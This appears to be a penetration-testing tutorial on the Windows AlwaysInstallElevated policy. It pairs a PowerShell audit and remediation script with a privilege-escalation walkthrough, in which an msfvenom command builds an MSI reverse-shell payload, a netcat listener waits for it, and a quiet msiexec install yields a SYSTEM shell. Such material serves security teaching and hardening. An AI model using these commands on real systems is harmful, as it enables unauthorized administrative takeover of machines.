Always Install Elevated

Overview

The Always Install Elevated policy is a Windows setting that allows standard users to install applications with elevated privileges. When this policy is enabled, any application installation started by a standard user runs with administrative rights, effectively bypassing User Account Control (UAC) prompts.

How It Works

When the Always Install Elevated setting is enabled, the following occurs:

  1. Elevation of Installations: Standard users can install applications without being prompted for administrator credentials. This means that any MSI (Microsoft Installer) package executed will run with elevated permissions.

  2. UAC Bypass: Users do not see the standard UAC prompt, so they may not realize that the software they are installing, harmful or not, is running with elevated rights.
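As an added example (not part of the original page), the following PowerShell audit checks whether the policy is effectively enabled on a host. It relies on the fact that the setting is stored under the Windows Installer policy key in both HKLM and HKCU and only takes effect when the AlwaysInstallElevated DWORD is 1 in both hives.

```powershell
# Added audit check, not from the original page. AlwaysInstallElevated is
# only effective when the DWORD is 1 under BOTH the machine and the user policy key.
$Paths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    $results = foreach ($p in $Paths) {
        $value = $null
        if (Test-Path $p) {
            # Missing value or missing key both mean "not set" for this hive
            $value = (Get-ItemProperty -Path $p -Name 'AlwaysInstallElevated' `
                      -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        [pscustomobject]@{ Hive = $p.Split(':')[0]; Value = $value }
    }
    # Enabled only if every hive has the value set to 1
    $enabled = (@($results | Where-Object { $_.Value -eq 1 }).Count -eq $Paths.Count)
    [pscustomobject]@{ Enabled = $enabled; Details = $results }
}

$state = Get-AlwaysInstallElevatedState
$state.Details | Format-Table -AutoSize
if ($state.Enabled) {
    Write-Warning 'AlwaysInstallElevated is ENABLED: MSI packages run by standard users install with SYSTEM rights.'
    # Remediation (requires admin rights; uncomment to apply): set both values to 0.
    # foreach ($p in $Paths) { Set-ItemProperty -Path $p -Name 'AlwaysInstallElevated' -Value 0 -Type DWord }
} else {
    Write-Output 'AlwaysInstallElevated is not effectively enabled.'
}
```

The equivalent Group Policy setting is "Always install with elevated privileges" under Administrative Templates > Windows Components > Windows Installer in both the Computer and User Configuration trees; disabling it there keeps the registry values from being re-applied on the next policy refresh.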

Creating and Executing a Malicious MSI Package for Reverse Shell Access

  1. Generate the Malicious MSI Package:

    • Use msfvenom to create a malicious MSI file that will initiate a reverse shell connection back to your listener. In this example, the local host (LHOST) is set to 10.10.10.10, and the local port (LPORT) is set to 4444.

    • The command to generate the MSI package is as follows:

      dollarboysushil@kali$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=4444 -f msi > dbs.msi

  2. Transfer the MSI File:

    • After generating the dbs.msi file, transfer it to the target machine where you want to execute it.

  3. Set Up a Netcat Listener:

    • On your attacking machine, set up a netcat listener to catch the reverse shell once the MSI package is executed:

      nc -lnvp 4444

  4. Execute the MSI Package:

    • On the target machine, run the following command to execute the malicious MSI package quietly, without displaying any prompts or restarting the system:

      C:\> msiexec /i c:\users\dollarboysushil\desktop\dbs.msi /quiet /qn /norestart

After this command runs, the target machine connects back to your listener, giving you a reverse shell running with SYSTEM privileges.
